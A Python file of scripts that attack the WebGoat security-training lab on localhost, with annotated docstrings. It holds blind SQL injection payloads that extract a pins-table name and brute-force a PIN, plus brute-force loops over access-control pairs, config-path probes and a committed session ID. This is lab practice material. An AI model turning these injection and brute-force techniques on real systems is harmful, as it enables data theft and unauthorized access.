def my_exploit_Blind_String_SQL_Injection(params):
    """Probe the WebGoat blind-string-SQL lab for the ``name`` of one ``pins`` row.

    ``params`` is the query-string fragment appended to the WebGoat ``attack``
    URL. For positions 1..4 and every candidate in ``string.ascii_letters`` a
    POST is sent asking whether ``SUBSTRING(name, position, 1)`` equals the
    candidate; the candidate is recorded whenever the response body contains
    "Account number is valid". Only letters are tried, so digits in the name
    are never found, and a hit at text offset 0 is ignored because the test is
    ``> 0``. Every (position, letter) pair is sent — the loop does not stop at
    the first hit for a position — so the result holds one character per
    matching response, in position order.

    Returns the recorded characters joined into a string ('' when nothing
    matched). The server-side fix that removes this true/false oracle is a
    parameterised query for the account lookup.
    """
    target = "http://localhost/WebGoat/attack?" + params
    exploit = '''101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'),  '''
    exploit_supply_b = ", 1) ="
    exploit_supply_l = "'"
    exploit_supply_r = "')"
    judge = "Account number is valid"
    http_send = tools.ToolsRequests()
    http_send.set_url(target)
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    # The form sent with each request; only 'account_number' changes.
    form = {'account_number': '', 'SUBMIT': 'Go'}
    hits = []
    for position in range(1, 5):
        for candidate in string.ascii_letters:
            form['account_number'] = (
                exploit + str(position) + exploit_supply_b
                + exploit_supply_l + candidate + exploit_supply_r
            )
            http_send.set_params(form)
            reply = http_send.send_post()
            if reply.text.find(judge) > 0:
                hits.append(candidate)
    # ''.join of an empty list is '' — same result as the explicit branch.
    return ''.join(hits)
def test_ACF_one():
    """Walk the WebGoat access-control lab (Screen=7, menu=200) over every user/resource pair.

    Each (User, Resource) combination produced by ``tools.tools_compose`` is
    POSTed in turn; the first response whose body contains the lesson's
    completion banner ends the loop and its user and resource are printed
    (Chinese labels). When no pair matches, a single error line is printed.

    ``cookies`` and ``auth`` are built but never applied — the corresponding
    ``set_cookie``/``set_auth`` calls are commented out and only the mitm
    headers are attached. NOTE(review): the JSESSIONID value is a session
    identifier committed to source; it is unused here, and such values belong
    in configuration rather than code.
    """
    url = "http://localhost/WebGoat/attack?Screen=7&menu=200"
    params = {"User": "", "Resource": "", "SUBMIT": "Check Access"}
    cookies = {
        "name": "JSESSIONID",
        "value": "3C5844601B61289CBBDE83F302598D76"
    }
    auth = ('guest', 'guest')
    judge = "Congratulations. You have successfully completed this lesson."
    changeUser = ['Moe', 'Larry', 'Curly', 'Shemp']
    selectResource = [
        'Public Share', 'Time Card Entry', 'Performance Review',
        'Time Card Approval', 'Site Manager', 'Account Manager'
    ]
    http_send = tools.ToolsRequests()
    http_send.set_url(url)
    #http_send.set_cookie(cookies)
    #http_send.set_auth(auth)
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    found = False
    for user, resource in tools.tools_compose(changeUser, selectResource):
        params["User"] = user
        params["Resource"] = resource
        http_send.set_params(params)
        reply = http_send.send_post()
        # A banner at text offset 0 would not count: the test is '> 0'.
        if reply.text.find(judge) > 0:
            print("可越权访问的用户:" + params["User"])
            print("管理员账户:" + params['Resource'])
            found = True
            break
    if not found:
        print('请求访问错误!')
def test_Insecure_Configuration():
    """GET three candidate configuration paths under the WebGoat root and print each URL and status code.

    Only the suffixes 'config', 'configuration' and 'conf' are tried. The
    response body is not inspected, so the printed status code is the only
    signal; nothing is returned.
    """
    base = 'http://localhost/WebGoat/'
    http_send = tools.ToolsRequests()
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    for suffix in ('config', 'configuration', 'conf'):
        candidate = base + suffix
        print(candidate)
        http_send.set_url(candidate)
        reply = http_send.send_get()
        print(reply.status_code)
def test_Denial_of_Service():
    """Submit three fixed username/password pairs to the WebGoat DoS lab login (Screen=3, menu=1200).

    Each POST response is discarded; nothing is printed or returned. The form
    dict is created with the key ' Username' (note the leading space), which
    the loop never overwrites: it assigns 'Username' and 'Password', so every
    request carries both ' Username' (always empty) and 'Username'.
    """
    url = "http://localhost/WebGoat/attack?Screen=3&menu=1200"
    params = {' Username': '', 'Password': '', 'SUBMIT': 'Login'}
    userList = ['jsnow', 'jdoe', 'jplane']
    pwList = ['passwd1', 'passwd2', 'passwd3']
    http_send = tools.ToolsRequests()
    http_send.set_url(url)
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    # Lists are the same length, so zip pairs them exactly like index access.
    for user, password in zip(userList, pwList):
        params['Username'] = user
        params['Password'] = password
        http_send.set_params(params)
        http_send.send_post()
def concurrency_func(username):
    """POST one ``username`` to the WebGoat concurrency lab (Screen=26, menu=800) and report whose data came back.

    Prints the submitted username, then "dave!" or "jeff!" when the response
    body contains the matching "Account information for user: ..." text (dave
    is checked first; a match at text offset 0 is not counted because the test
    is ``> 0``). Prints nothing further when neither marker is present and
    returns None. The name suggests the caller runs several of these at once
    to compare responses — presumably, not visible here.
    """
    print(username)
    http_send = tools.ToolsRequests()
    http_send.set_url("http://localhost/WebGoat/attack?Screen=26&menu=800")
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    http_send.set_params({'username': username, 'SUBMIT': 'Submit'})
    body = http_send.send_post().text
    markers = (
        ('Account information for user: dave', "dave!"),
        ('Account information for user: jeff', "jeff!"),
    )
    for marker, label in markers:
        if body.find(marker) > 0:
            print(label)
            break
def test_Blind_Numeric_SQL_Injection():
    """Brute-force the numeric ``pin`` on the WebGoat blind-numeric-SQL lab (Screen=56, menu=1100).

    (Original docstring, translated: blind SQL injection — locate the correct
    data from whether the page reports success or failure.) Every integer in
    2000..2499 is sent as the PIN guess for the hard-coded cc_number and
    "正确的pin:<n>" is printed for each response containing "Account number is
    valid"; a match at text offset 0 is skipped since the test is ``> 0``, and
    the loop does not stop at the first hit. Nothing is returned. The
    server-side fix that removes this oracle is a parameterised query.
    """
    url = "http://localhost/WebGoat/attack?Screen=56&menu=1100"
    form = {'account_number': '', 'SUBMIT': 'Go'}
    exploit = '''101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') = '''
    exploit_supply = " )"
    judge = "Account number is valid"
    http_send = tools.ToolsRequests()
    http_send.set_url(url)
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    for guess in range(2000, 2500):
        form['account_number'] = exploit + str(guess) + exploit_supply
        http_send.set_params(form)
        reply = http_send.send_post()
        if reply.text.find(judge) > 0:
            print("正确的pin:" + str(guess))